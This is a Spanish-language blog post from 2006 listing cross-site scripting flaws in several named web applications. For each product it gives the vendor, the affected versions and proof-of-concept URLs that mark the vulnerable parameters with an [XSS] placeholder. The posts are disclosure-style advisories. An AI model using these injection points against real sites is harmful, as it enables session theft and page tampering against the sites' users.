ecoestadistica.com

domingo, marzo 26, 2006

Vulnerabilidades...

Web Quiz pro XSS vuln.
vendedor:www.calorisplanitia.com/online-quiz-system.aspx
Version Afectada: pro

Prueba de Concepto:

/prequiz.asp?examid=1&exam=[XSS]
/student.asp?msg=[XSS]

---------------------------------------------------------------------------------------

E-School Management System XSS vuln.
vendedor:www.calorisplanitia.com/e-school-management-system.aspx
Version Afectada: 1.0 y anterior

Prueba de Concepto:

/default.asp?msg=[XSS]

---------------------------------------------------------------------------------------

EZHomepagePro multiple XSS vuln.
vendedor:www.htmljunction.net/ezhomepagepro/index.asp
Version Afectada: v1.5 y anterior

Prueba de Concepto:

/common/email.asp?page=user&m=y&select=mouse-&usid
=2&uname=guest&aname=&adid=[XSS]
/common/email.asp?page=user&m=y&select=mouse-&usid
=2&uname=&aname=[XSS]
/users/users_search.asp?page=user&uname=mouse&usid=
2&aname=&adid=&m=[XSS]
/users/users_search.asp?page=user&uname=mouse&usid=
2&aname=&adid=[XSS]
/users/users_search.asp?page=user&uname=mouse&usid=
2&aname=[XSS]
/users/users_calendar.asp?view=yes&action=write&una
me=mouse&usid=2&date=3/2/2006&sdate=3/2/2006&page=[XSS]
/users/users_profiles.asp?page=user&uname=mouse&usid=
2&aname=&adid=[XSS]
/users/users_profiles.asp?page=user&uname=mouse&usid=
2&aname=[XSS]
/users/users_mgallery.asp?gn=mouse&gp=guest&fl=Favor
ites&usid=[XSS]

--------------------------------------------------------------------------------------

WebAPP multiple XSS vuln.
vendedor:http://www.web-app.org/
Version Afectada: 0.9.9.3.2 y anterior

Prueba de Concepto:

http://victim/cgi-bin/index.cgi?action=[XSS]
http://victim/cgi-bin/index.cgi?action=&id=[XSS]
http://victim/cgi-bin/index.cgi?action=forum
&board=chitchat&op=&num=[XSS]
http://victim/cgi-bin/index.cgi?action=&board=[XSS]
http://victim/cgi-bin/index.cgi?action=&cat=[XSS]

--------------------------------------------------------------------------------------

BlankOL XSS vuln.
vendedor:http://www.blankol.com/
Version Afectada: 1 y anterior

Prueba de Concepto:

/bol.cgi?file=[XSS]
/bol.cgi?function=[XSS]

--------------------------------------------------------------------------------------

Absolute Image Gallery XE 2.0 XSS vuln.

vendedor:http://www.xigla.com/absoluteig/index.htm
Version Afectada:V2.0 y anterior

Prueba de Concepto:

/gallery.asp?action=viewimage&categoryid=8&text
=&imageid=43&box=&shownew=[XSS]

ecoestadistica.com